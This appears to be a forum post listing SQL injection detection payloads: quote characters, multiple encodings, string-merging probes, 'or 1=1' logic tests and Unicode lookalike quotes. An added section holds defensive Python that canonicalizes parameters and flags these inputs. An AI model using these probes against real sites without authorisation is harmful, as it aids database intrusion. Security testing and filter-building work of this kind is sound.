09-14-2022, 09:47 PM
Detection of an SQL injection entry point
Simple characters
Multiple encoding
Merging characters
Logic Testing
Weird characters
Quote:
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
Multiple encoding
Quote:
%%2727
%25%27
Merging characters
Quote:
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
Logic Testing
Quote:
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
Weird characters
Quote:
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
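
Added example, not part of the original post: a defender-side canonicalization check that shows why a filter must inspect the value the database layer finally sees. It percent-decodes a parameter until it is stable, folds the two lookalike characters named above into ASCII quotes, and reports any of the simple characters that remain. The function names, the `MAX_ROUNDS` cap and the `%2527` sample are assumptions made for the example.

```python
from urllib.parse import unquote

# Lookalike characters the post lists as being turned into ASCII quotes.
LOOKALIKES = str.maketrans({"\u02ba": '"', "\u02b9": "'"})
# Single-character probes from the "Simple characters" list.
METACHARS = set("'\"#;)")
MAX_ROUNDS = 5  # assumption: cap on decode passes, avoids unbounded loops


def canonicalize(raw: str):
    """Percent-decode until the value stops changing, then fold lookalikes."""
    value, rounds = raw, 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    folded = value.translate(LOOKALIKES)
    return folded, rounds, folded != value


def inspect_parameter(raw: str) -> dict:
    """Report what a backend would see after decoding and best-fit mapping."""
    canonical, rounds, had_lookalike = canonicalize(raw)
    return {
        "canonical": canonical,
        "decode_rounds": rounds,
        "multi_encoded": rounds > 1,
        "lookalike_quote": had_lookalike,
        "metachars": sorted(METACHARS & set(canonical)),
    }


if __name__ == "__main__":
    # Values from the post, plus %2527 (constructed double encoding of ').
    for sample in ["1", "%27", "%25%27", "%2527", "%CA%BA", "%CA%B9"]:
        print(f"{sample!r:12} -> {inspect_parameter(sample)}")
```

A filter that checks only the raw string misses every sample except a literal quote; checking the canonical form catches them all.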